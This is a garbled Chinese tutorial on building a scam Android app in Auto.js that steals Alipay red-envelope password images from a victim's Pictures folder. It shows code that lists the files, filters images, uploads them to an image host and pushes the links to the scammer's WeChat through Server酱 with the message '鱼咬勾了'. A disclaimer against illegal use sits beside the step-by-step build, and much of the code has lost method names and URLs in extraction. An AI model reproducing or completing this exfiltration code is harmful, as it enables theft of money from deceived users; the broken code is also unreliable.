
支付宝ar红包
-
2023年2月19日发(作者:)盗刷⽀付宝⼝令新骗局(讲解与制作)
盗取⽀付宝⼝令红包,本⽂详细解释原理与制作过程
不要⽤于⾮法⽤途,微信推送接⼝,图床访问⽇志,⽀付宝收款等都可以找到你,⽹络不是法外之地
原理
骗⼦会让你发⼀个⽀付宝⼝令红包,说是来证明你有钱,等交易完成之后你再把⼝令给他,等你发了红包,这时候看似正常⽽⼜良⼼的商家会给你发⼀个软件,软件可能是某某游戏外
挂,suo机⽣成器,甚⾄是⾊情软件,等你打开软件的那⼀刻,骗⼦也会收到⼀条名为“鱼咬勾了”的信息,你的⼝令就在那⾥⾯。
⼤佬看到这⾥就可以退出了,全⽂没有什么技术难点
思路
思路很简单,接下来⼀步⼀步实现
开始制作
语⾔选⽤autojs,⽤这个写简单
遍历指定⽬录
⽀付宝发送⼝令红包的时候会⾃动⽣成图⽚并保存到/storage/emulated/0/Pictures中,但是为了代码以后升级与扩展,我还是决定把路径以参数的形式传进去
代码实现:
functiongetFilesFromPath(path){
/*格式:getFilesFromPath(⽂件夹路径)*/
/*解释:获取⽂件夹所有⽂件和⽂件夹递归遍历返回⽂件路径数组*/
vararrDir=newArray();
vararrFile=newArray();
try{
varrp=/^([/][^:*?|]+[/]?)+$/;
if((path)==false)throw\"⾮法⽂件路径,esFromPath(?);\"+path;
}catch(err){
log(err);
exit();
}
/*获取path⽬录下所有⽂件夹和⽂件*/
vararr=r(path);
/*遍历⽂件和⽂件夹*/
for(vari=0;i<;i++){
/*连接路径*/
newPath=(path,arr[i]);
/*判断路径类型*/
if((newPath)){
//(newPath);
/*递归遍历⽂件夹*/
//vararrF=getFilesFromPath(newPath);
//arrDir=(arrF);
//注释这⼏⾏是递归遍历所有⽂件的,这⾥不需要,所以注释
}elseif((newPath)){
(newPath);
}
}
/*按字母升序排序数组*/
();
();
/*连接数组并返回*/
(arrFile);
}
正则筛选图⽚
这个其实是可以写⼊到上⼀个函数⾥⾯的,但是,⼀个函数⼀个功能,不能混,不然过⼏天我就看不懂⾃⼰的代码了
代码实现:
functionimgPatt(arrdizhi){
varimgarr=[]
for(j=0;j<;j++){//遍历所有的⽂件
if(arrdizhi[j].search(/^.*?[.](bmp|jpg|gif|jpeg)/i)==false){//判断是否是图⽚,如果是就写⼊到数组中
imgarr[]=arrdizhi[j];
}
}
returnimgarr;
}
上传图床
这⼀步其实是可以上传到⾃⼰服务器的,但是考虑到安全性,还是上传到图床⽐较稳
代码实现(上传):
functionupImg(path){
varurl=\"/pic/upload_\";
varres=ltipart(url,{
\"file\":open(path),
});
();
}
由于上传的不是⼀张图⽚,所以还得写个循环:
functionarrUp(arrimg){
vararrurl_f=[]
for(i=0;i<;i++){
arrurl_f[arrurl_]=upImg(arrimg[i])
}
returnarrurl_f;
}
推送到微信
这⾥⽤的是Server酱的接⼝,⽤别的接⼝⾃⼰写吧(注意,我这⾥是把结果弄成md的形式上传的,这样微信收到的就可以直接看到,不需要再转到浏览器了)
代码实现:
functionweChat(arrstr){
varmd;
for(i=0;i<;i++){
md+=\"n\";
}
varapi=\"/?text=鱼咬勾了&desp=\";
varjson_api=(api+md).();
returnjson_api;
}
⾄此,核⼼代码就已经写完了,往下我也不写了,再写就是帮助你犯罪了